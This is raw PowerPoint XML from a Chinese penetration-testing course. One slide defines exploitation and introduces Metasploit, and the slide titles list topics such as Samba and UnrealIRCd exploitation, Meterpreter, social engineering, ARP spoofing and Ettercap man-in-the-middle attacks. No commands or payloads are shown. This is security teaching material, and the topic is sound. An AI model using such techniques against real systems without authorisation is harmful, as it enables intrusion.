              <a:t>—</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5397" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5397" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5397" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>       第四课 漏洞利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283494895"/>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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418084" y="1848674"/>
            <a:ext cx="5431871" cy="3703828"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是利用程序中的某些漏洞，来得到计算机的控制权。通过漏洞扫描，可以从目标系统中找到容易攻击的漏洞。然后，利用该漏洞获取权限，从而实现对目标系统的控制。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>提供了大量的漏洞利用工具。其中，最知名是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>渗透测试框架。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6541147" y="2203375"/>
            <a:ext cx="4806225" cy="2555912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="842857686"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office 主题">
  <a:themeElements>
    <a:clrScheme name="蓝色">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="44546A"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="1045C9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="002A51"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="ED7D31"/>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蓝色">
    <a:dk1>
      <a:sysClr val="windowText" lastClr="000000"/>
    </a:dk1>
    <a:lt1>
      <a:sysClr val="window" lastClr="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="44546A"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="E7E6E6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="1045C9"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="002A51"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="ED7D31"/>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24525</TotalTime>
  <Words>8874</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>605</Paragraphs>
  <Slides>77</Slides>
  <Notes>63</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1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>77</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="94" baseType="lpstr">
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>pingfang SC</vt:lpstr>
      <vt:lpstr>pingfang SC</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>华文新楷</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>使用Nessus扫描漏洞</vt:lpstr>
      <vt:lpstr>安装Nessus</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>扫描漏洞和分析报告</vt:lpstr>
      <vt:lpstr>Kali Linux 渗透测试—         第四课 漏洞利用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>什么是Metasploit</vt:lpstr>
      <vt:lpstr>基本体系结构</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Metasploit 用户界面</vt:lpstr>
      <vt:lpstr>启动</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>  查询渗透测试模块</vt:lpstr>
      <vt:lpstr>第三方查找</vt:lpstr>
      <vt:lpstr>手动导入第三方模块</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>空指令模块</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>设置编码</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>设置架构</vt:lpstr>
      <vt:lpstr>  辅助模块</vt:lpstr>
      <vt:lpstr>规避模块</vt:lpstr>
      <vt:lpstr>渗透攻击</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控制Meterpreter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攻击监听</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>渗透攻击Samba服务</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>UnreallRCd后门漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>社会工程学攻击</vt:lpstr>
      <vt:lpstr>启动社会工程学工具包（SET）</vt:lpstr>
      <vt:lpstr>Web向量攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>使用arpspoof工具实施arp欺骗</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>使用Ettercap工具实时中间人攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Ettercap命令行模式</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DY</dc:creator>
  <cp:lastModifiedBy>haokui1991@126.com</cp:lastModifiedBy>
  <cp:revision>4457</cp:revision>
  <cp:lastPrinted>2019-08-31T16:18:59Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-14T11:23:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-18T13:00:04Z</dcterms:modified>
</cp:coreProperties>
</file>